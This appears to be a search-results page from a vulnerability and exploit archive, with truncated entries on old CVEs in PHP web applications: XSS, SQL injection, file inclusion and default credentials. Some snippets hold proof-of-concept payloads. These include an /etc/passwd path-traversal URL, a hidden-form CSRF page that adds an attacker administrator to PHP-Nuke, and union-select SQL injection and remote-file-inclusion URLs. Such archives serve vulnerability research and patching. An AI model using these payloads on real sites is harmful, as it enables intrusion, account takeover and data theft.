6697 matches found
skalinks-csrf.txt
Super Editor document.addadmin.submit...
dmguest-lfi.txt
DM Guestbook = 0.4.1 Multiple Local File Include Vulnerabilities http://sourceforge.net/project/showfiles.php?groupid=101364 /guestbook.0.4.1/ POC : /guestbook.php?lng=../../../../../../../etc/passwd%00 /admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00...
CVE-2007-4862
CVE-2007-4862 is a documented XSS vulnerability affecting SAXON 5.4 in admin/menu.php via config[news_url]. Exploitation requires register_globals On and magic_quotes_gpc Off; the NVD/NVD-derived reports list a Medium impact (I/P) and network access with no confidentiality or availability impact,...
emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability
No description provided by source. -------------------- emagiC CMS.Net v4.0 Remote SQL Injection Exploit -------------------- + Found : hak3r-b0y + Gr33tz : darko , V4 CrackerS , hackeralQassam , Ans , Barra, all ans-hacker.com members + Script URL : http://www.emagic-cms.com/ + D0rk :...
emagiC CMS.Net 4.0 - emc.asp SQL Injection
emagiC CMS.Net 4.0 - emc.asp SQL Injection -------------------- emagiC CMS.Net v4.0 Remote SQL Injection Exploit -------------------- + Found : hak3r-b0y + Gr33tz : darko , V4 CrackerS , hackeralQassam , Ans , Barra, all ans-hacker.com members + Script URL : http://www.emagic-cms.com/ + D0rk :...
Vanilla 1.1.3 - Blind SQL Injection
Vanilla 1.1.3 - Blind SQL Injection = 4.1, magic_quotes_gpc=Off Tested on versions 1.1.3, 1.1.2, 1.0.1 echo "------------------------------------------------------------\n"; echo "Vanilla - use specific prefix default LUM\n"; echo "-id= - use specific user id default 1\n"; echo "-c= - benchmark's...
CVE-2002-2290
CVE-2002-2290 affects Mambo Site Server 4.0.11, where a default username/password of admin enables remote attackers to gain privileges. The description across sources repeats that a default credential leads to privilege escalation, but no concrete exploit vectors or patched versions are provided ...
CVE-2002-2304
CVE-2002-2304 concerns a SQL injection vulnerability in MyPHPLinks (versions 2.1.9 and 2.2.0) affecting the admin/auth/checksession.php component. The vulnerability allows remote attackers to manipulate the idsession parameter to execute arbitrary SQL commands. Public records indicate an overall ...
CVE-2004-2730
CVE-2004-2730 describes a local privilege escalation in Sysinternals PsTools: an improper disconnection from remote IPC$ and ADMIN$ shares allows local users to access these shares with elevated privileges by reusing existing mappings. The connected Kaspersky entry (KLA10264) confirms a local-exp...
Design/Logic Flaw
Multiple PHP remote file inclusion vulnerabilities in FrontAccounting FA 1.12 allow remote attackers to execute arbitrary PHP code via a URL in the pathtoroot parameter to (1) access/logout.php or certain PHP scripts under (2) admin/, (3) dimensions/, (4) gl/, (5) inventory/, (6) manufacturing/, (7) purchasing...
CVE-2007-5139
PHP remote file inclusion vulnerability in admin/include/header.php in chupix 0.2.3, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the repertoire parameter...
CVE-2007-5139
CVE-2007-5139 affects chupix 0.2.3 and relates to a PHP remote file inclusion in admin/include/header.php when register_globals is enabled. The vulnerability allows an attacker to execute arbitrary PHP code by supplying a URL in the repertoire parameter. Root cause is the unsafe handling of user-...
CVE-2007-5127
Multiple cross-site scripting (XSS) vulnerabilities in SimpGB 1.46.02 allow remote attackers to inject arbitrary web script or HTML via (1) the l_username parameter to the default URI under admin/ or (2) the l_emoticonlist parameter to admin/emoticonlist.php...
CVE-2007-5127
CVE-2007-5127 describes multiple XSS vulnerabilities in SimpGB 1.46.02. The issues allow remote attackers to inject arbitrary JavaScript/HTML via two parameters: (1) l_username in the default admin/ URI and (2) l_emoticonlist in admin/emoticonlist.php. The root cause is unsanitized/unvalidated i...
CVE-2007-5091
Multiple cross-site scripting (XSS) vulnerabilities in eGroupWare 1.4.001 allow remote attackers to inject arbitrary web script or HTML via the catdatacolor parameter to (1) preferences/inc/class.uicategories.inc.php and (2) admin/inc/class.uicategories.inc.php...
CVE-2007-4874
Multiple cross-site scripting (XSS) vulnerabilities in SimpNews 2.41.03 allow remote attackers to inject arbitrary web script or HTML via (1) the lusername parameter to admin/layout2b.php, and (2) the backurl parameter to comment.php...
PHP-Nuke add admin ALL Versions
Paste this code into an HTML page then link it to victim victim must be admin iframe name="aiuto" frameborder="0" height="0" width="0"/iframe FORM name="Faiuto" ACTION="http://VICTIMURL/nuke/admin.php" target="aiuto" METHOD=POST input type=hidden NAME="addname" value="ATTACKER" input type=hidden...
phpnuke-admin.txt
Paste this code into an HTML page then link it to victim victim must be admin document.Faiuto.submit You are admin now ; Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...
Joomla! Component joom12pic 1.0 - Remote File Inclusion
Joom!12Pic Component RFI Bug in : /administrator/components/comjoom12pic/admin.joom12pic.php?mosConfiglivesite= Variable : $mosConfiglivesite Dork: "comjoom12pic" Example: http://xxx.net/administrator/components/comjoom12pic/admin.joom12pic.php?mosConfiglivesite=attacker Greets to all...
Omnistar Article Manager Software - 'article.php' SQL Injection
/bin/bash Omnistar Article Manager Software article.php Remote SQL Injection Exploit Exploit Coded By : Cold z3ro http://Hackteach.org Exploit : /article.php?op=favorite&articleid=4&pageid=-1'//union//select//name,1//from//user/...